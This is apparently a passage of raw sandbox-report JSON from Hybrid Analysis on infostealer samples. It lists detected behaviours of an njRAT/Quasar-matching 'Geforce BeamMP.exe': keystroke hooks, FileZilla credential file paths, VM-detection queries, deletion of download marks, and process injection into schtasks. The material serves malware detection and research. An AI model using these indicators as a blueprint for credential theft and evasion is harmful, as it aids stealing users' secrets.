2, "relevance": 1, "name": "Contains reference to cryptographic keys", "description": "Found string \"[PRIVATE KEY LOCATION: \"{0}\"]\" (Indicator: \"private key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Private key passed - public key expected.\" (Indicator: \"private key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Private key passed - public key expected.\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Public Key:\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Public key presented not for certificate signature\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Public key certificate for attribute certificate cannot be searched.\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Subject public key cannot be decoded.\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Public key of issuer certificate of CRL could not be retrieved.\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Attribute certificate issuer is also a public key certificate issuer.\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Public key certificate specified in base certificate ID for attribute certificate cannot be found.\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Certification path for public key certificate of attribute certificate could not be build.\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Trusted CA Public Key:\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"expected public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Unrecognized curve OID for GostR3410x2001 private key\" (Indicator: \"private key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"algorithm identifier in private key not recognised\" (Indicator: \"private key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"error recovering GOST3410_2001 public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"invalid length for GOST3410_2001 public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"error recovering GOST3410_94 public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"error recovering GOST3410_2012 public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"invalid length for GOST3410_2012 public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"algorithm identifier in public key not recognised:\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Expected a public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Expected a private key\" (Indicator: \"private key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"invalid DH public key\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"OID is not a valid public key parameter set\" (Indicator: \"public key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"EOF encountered in middle of Ed25519 private key\" (Indicator: \"private key\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains key cryptographic functions (API string)\n Matched sigs: Contains ability to perform AES/RC4 encryption (API string)\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: Contains reference to cryptographic keys\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: YARA signature match - AES encryption\n Matched sigs: Contains ability to use Microsoft's Enhanced Cryptographic Provider", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Possibly tries to communicate over SSL connection (HTTPS)", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-408", "type": 2, "relevance": 1, "name": "Contains ability to delete files", "description": "Observed string: \"\"del /a /q /f \"\" (Indicator: \"\"del \") in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005912.00000000.66618.00300000.00000004.mdmp, 00000000-00005912.00000001.68541.00300000.00000004.mdmp, 00000000-00005912.00000002.70462.00300000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" called an API \"AdjustTokenPrivileges\"on file: C:\\Windows\\System32\\cryptsp.dll\" (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeDebugPrivilegei\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005912.00000001.68541.00300000.00000004.mdmp, 00000000-00005912.00000002.70462.00300000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Pattern Matching", "identifier": "yara-112", "type": 13, "relevance": 3, "name": "YARA signature match - MD5 algorithm", "description": "YARA signature for MD5 algorithm matched on file \"sample.bin\"\n YARA signature for MD5 algorithm matched on file \"Geforce BeamMP.exe.2108408080\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"DeleteDC\" (Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500, API is part of module: GDI32.DLL)\n Found string \"CryptHashData\" (Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500, API is part of module: CRYPTSP.DLL)\n Found string \"GetCurrentThreadId\" (Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500, API is part of module: KERNELBASE.DLL)\n Found string \"GetWindowThreadProcessId\" (Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500, API is part of module: USER32.DLL)\n Found string \"shutdown\" (Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500, API is part of module: WS2_32.DLL)\n Found string \"Escape\" (Source: 60001f9-_~_, API is part of module: GDI32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"Geforce BeamMP.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: 00000000-00005912]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" at 00000000-00005912-00000105-6394033", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 5912)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "string-55", "type": 2, "relevance": 10, "name": "Found a reference to a WMI query string known to be used for VM detection", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Indicator: \" win32_operatingsystem\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n \"SELECT * FROM Win32_BIOS\" (Indicator: \" win32_bios\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n \"SELECT * FROM Win32_BaseBoard\" (Indicator: \" win32_baseboard\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n \"SELECT * FROM Win32_Processor\" (Indicator: \" win32_process\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n \"Select * From Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Indicator: \" win32_operatingsystem\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "stream-86", "type": 1, "relevance": 4, "name": "Contains ability to retrieve information about the current system", "description": "Quasar.Common.Messages.GetSystemInfoResponse::set_SystemInfos(System.Collections.Generic.List`1<System.Tuple`2<System.String,System.String>>) at 3186fc776c32b580078d6e0da80dcd97-60001d3-_~_\n Ꮵꛈ跃譾ꍄ椷猪ẙᙗ遽惖꥙빏丼ủᓍﻑᏆߐ::詏쎛๏聦ⴁ워⸹:댕贋綕䑛ꠂ뉷≔瑜䖒푼(괨螕冣禯ታ夢뉊㳥ᴯ腨ꛇ䉋⠷鸠送柸큡墧荮,Quasar.Common.Messages.GetSystemInfo) at 3186fc776c32b580078d6e0da80dcd97-60001d2-_~Execute", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "stream-33", "type": 1, "relevance": 5, "name": "Contains ability to listen for incoming connections", "description": "Gma.System.MouseKeyHook.Implementation.MouseListener::OnUp(System.Windows.Forms.MouseEventArgs) at 3186fc776c32b580078d6e0da80dcd97-6000a16-MouseListener~ProcessUp\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009cf-EventFacade~add_MouseWheelExt\n Gma.System.MouseKeyHook.Implementation.BaseListener::set_Handle(Gma.System.MouseKeyHook.WinApi.HookResult) at 3186fc776c32b580078d6e0da80dcd97-60009a3-ctor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009ca-EventFacade~remove_MouseUp\n Gma.System.MouseKeyHook.Implementation.MouseListener::ProcessDragStarted(Gma.System.MouseKeyHook.MouseEventExtArgs&) at 3186fc776c32b580078d6e0da80dcd97-6000a18-MouseListener~ProcessDrag\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009d2-EventFacade~remove_MouseDoubleClick\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009d8-EventFacade~remove_MouseDragFinished\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3186fc776c32b580078d6e0da80dcd97-60009bc-EventFacade~remove_KeyPress\n Gma.System.MouseKeyHook.Implementation.BaseListener::Dispose() at 3186fc776c32b580078d6e0da80dcd97-60009db-EventFacade~Dispose\n Gma.System.MouseKeyHook.Implementation.GlobalMouseListener::IsDoubleClick(Gma.System.MouseKeyHook.MouseEventExtArgs) at 3186fc776c32b580078d6e0da80dcd97-60009b0-GlobalMouseListener~ProcessDown\n Gma.System.MouseKeyHook.Implementation.MouseListener::ProcessUp(Gma.System.MouseKeyHook.MouseEventExtArgs&) at 3186fc776c32b580078d6e0da80dcd97-60009b1-GlobalMouseListener~ProcessUp\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009d0-EventFacade~remove_MouseWheelExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3186fc776c32b580078d6e0da80dcd97-60009be-EventFacade~remove_KeyUp\n Gma.System.MouseKeyHook.Implementation.KeyListener::GetDownUpEventArgs(Gma.System.MouseKeyHook.WinApi.CallbackData) at 3186fc776c32b580078d6e0da80dcd97-6000a34-KeyListener~Callback\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009d4-EventFacade~remove_MouseDragStarted\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009c4-EventFacade~remove_MouseClick\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009c0-EventFacade~remove_MouseMove\n Gma.System.MouseKeyHook.Implementation.KeyListener::.ctor(Gma.System.MouseKeyHook.Implementation.Subscribe) at 3186fc776c32b580078d6e0da80dcd97-6000999-ctor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009d9-EventFacade~add_MouseDragFinishedExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009cc-EventFacade~remove_MouseUpExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009c9-EventFacade~add_MouseUp\n Gma.System.MouseKeyHook.Implementation.MouseListener::OnDown(System.Windows.Forms.MouseEventArgs) at 3186fc776c32b580078d6e0da80dcd97-6000a15-MouseListener~ProcessDown\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009c6-EventFacade~remove_MouseDown\n Gma.System.MouseKeyHook.Implementation.BaseListener::.ctor(Gma.System.MouseKeyHook.Implementation.Subscribe) at 3186fc776c32b580078d6e0da80dcd97-6000a2a-ctor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009bf-EventFacade~add_MouseMove", "origin": "Hybrid Analysis Technology", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "stream-85", "type": 1, "relevance": 5, "name": "Contains ability to open a port and listen for incoming connection", "description": "Org.BouncyCastle.Tls.OfferedPsks::GetBindersSize(Org.BouncyCastle.Tls.TlsPsk[]) at 3186fc776c32b580078d6e0da80dcd97-6001982-TlsUtilities~AddPreSharedKeyToClientHelloRetry\n System.Type::GetMethod(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Type[],System.Reflection.ParameterModifier[]) at 3186fc776c32b580078d6e0da80dcd97-600035a-Helpers~GetInstanceMethod\n 욨ᱨ艉ࠈ卢䱓튏䈢并䣣쬁쟛ﻟ薽褾⧬맧柞::set_Handle(System.Net.Sockets.Socket) at 3186fc776c32b580078d6e0da80dcd97-6000055-ctor\n System.Type::GetMember(System.String,System.Reflection.BindingFlags) at 3186fc776c32b580078d6e0da80dcd97-60006e6-MetaType~AddField\n Gma.System.MouseKeyHook.Implementation.MouseListener::OnUp(System.Windows.Forms.MouseEventArgs) at 3186fc776c32b580078d6e0da80dcd97-6000a16-MouseListener~ProcessUp\n System.Type::GetMethod(System.String,System.Reflection.BindingFlags) at 3186fc776c32b580078d6e0da80dcd97-600063b-EmitCreateInstance\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009cf-EventFacade~add_MouseWheelExt\n System.Net.Sockets.SocketException::get_SocketErrorCode() at 3186fc776c32b580078d6e0da80dcd97-600197f-TlsUtilities~IsTimeout\n System.Type::GetConstructors(System.Reflection.BindingFlags) at 3186fc776c32b580078d6e0da80dcd97-6000365-Helpers~GetConstructors\n Gma.System.MouseKeyHook.Implementation.BaseListener::set_Handle(Gma.System.MouseKeyHook.WinApi.HookResult) at 3186fc776c32b580078d6e0da80dcd97-60009a3-ctor\n Org.BouncyCastle.Tls.TlsUtilities::IsTimeout(System.Net.Sockets.SocketException) at 3186fc776c32b580078d6e0da80dcd97-6001418-DtlsTransport~Send\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009ca-EventFacade~remove_MouseUp\n Gma.System.MouseKeyHook.Implementation.MouseListener::ProcessDragStarted(Gma.System.MouseKeyHook.MouseEventExtArgs&) at 3186fc776c32b580078d6e0da80dcd97-6000a18-MouseListener~ProcessDrag\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009d2-EventFacade~remove_MouseDoubleClick\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3186fc776c32b580078d6e0da80dcd97-60009d8-EventFacade~remove_MouseDragFinished\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3186fc776c32b580078d6e0da80dcd97-60009bc-EventFacade~remove_KeyPress\n Gma.System.MouseKeyHook.Implementation.BaseListener::Dispose() at 3186fc776c32b580078d6e0da80dcd97-60009db-EventFacade~Dispose\n Gma.System.MouseKeyHook.Implementation.GlobalMouseListener::IsDoubleClick(Gma.System.MouseKeyHook.MouseEventExtArgs) at 3186fc776c32b580078d6e0da80dcd97-60009b0-GlobalMouseListener~ProcessDown\n System.Type::GetMethod(System.String,System.Reflection.BindingFlags) at 3186fc776c32b580078d6e0da80dcd97-6000357-Helpers~GetInstanceMethod\n System.Net.Sockets.Socket::IOControl(System.Net.Sockets.IOControlCode,System.Byte[],System.Byte[]) at 3186fc776c32b580078d6e0da80dcd97-6000c77-_~SetKeepAliveEx\n System.Type::GetMethod(System.String,System.Reflection.BindingFlags) at 3186fc776c32b580078d6e0da80dcd97-600085f-CompilerContext~EmitBasicRead\n System.Type::GetMethods(System.Reflection.BindingFlags) at 3186fc776c32b580078d6e0da80dcd97-6000862-CompilerContext~GetWriterMethod\n Gma.System.MouseKeyHook.Implementation.MouseListener::ProcessUp(Gma.System.MouseKeyHook.MouseEventExtArgs&) at 3186fc776c32b580078d6e0da80dcd97-60009b1-GlobalMouseListener~ProcessUp\n Org.BouncyCastle.Tls.TlsUtilities::IsTimeout(System.Net.Sockets.SocketException) at 3186fc776c32b580078d6e0da80dcd97-60013d2-DtlsRecordLayer~ReceiveDatagram\n System.Type::GetConstructor(System.Reflection.BindingFlags,System.Reflection.Binder,System.Type[],System.Reflection.ParameterModifier[]) at 3186fc776c32b580078d6e0da80dcd97-6000364-Helpers~GetConstructor", "origin": "Hybrid Analysis Technology", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-28", "type": 6, "relevance": 3, "name": "Adjusts debug privileges", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"C:\\Windows\\System32\\cryptsp.dll\"", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" opened \"C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"win_njrat_g0\" matched file \"sample.bin\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"win_njrat_g0\" matched file \"Geforce BeamMP.exe.2108408080\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"MALWARE_Win_QuasarStealer\" matched file \"sample.bin\" as \"Detects Quasar infostealer\" (Author: ditekshen)\n YARA signature \"MALWARE_Win_QuasarStealer\" matched file \"Geforce BeamMP.exe.2108408080\" as \"Detects Quasar infostealer\" (Author: ditekshen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 616)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 616)\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 616)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-42", "type": 6, "relevance": 7, "name": "Tries to hide tracks of having downloaded a file from the internet", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" opened \"C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "string-11", "type": 2, "relevance": 6, "name": "Found FTP credentials location strings", "description": "\"{0}\\FileZilla\\recentservers.xml\" (Indicator: \"recentservers.xml\") in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"{0}\\FileZilla\\sitemanager.xml\" (Indicator: \"sitemanager.xml\") in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"{0}\\\\FileZilla\\\\recentservers.xml\" (Indicator: \"recentservers.xml\") in Source: 600007d-ctor\n \"{0}\\\\FileZilla\\\\sitemanager.xml\" (Indicator: \"sitemanager.xml\") in Source: 600007d-ctor", "origin": "File/Memory", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "string-56", "type": 2, "relevance": 6, "name": "Found a reference to an external IP address lookup service", "description": "\"https://api.ipify.org/\" (Indicator: \"api.ipify.org\"; File: \"6000217-_~_\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8
https://hybrid-analysis.com/sample/3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8
Hybrid Analysis - Infostealers
{"size": 98311, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8", "sha256": "3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8", "av_detect": 91, "vx_family": "Dump:Generic.Dacic.9C483F5C.A", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 3, "total_signatures": 186, "extracted_files": [{"name": "rundll32.exe", "file_path": "%WINDIR%\\system\\rundll32.exe", "file_size": 93247, "sha256": "a0aff03ea6a3e70faaface8ae97d8105ae41a936f07798971d9d548c3a307a61", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe (PID: 5944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "notepad_.exe", "file_size": 99401, "sha256": "16615b7fb0092ba75475b7332852b4269c351405154ff7a18bb1e12401de0e16", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS 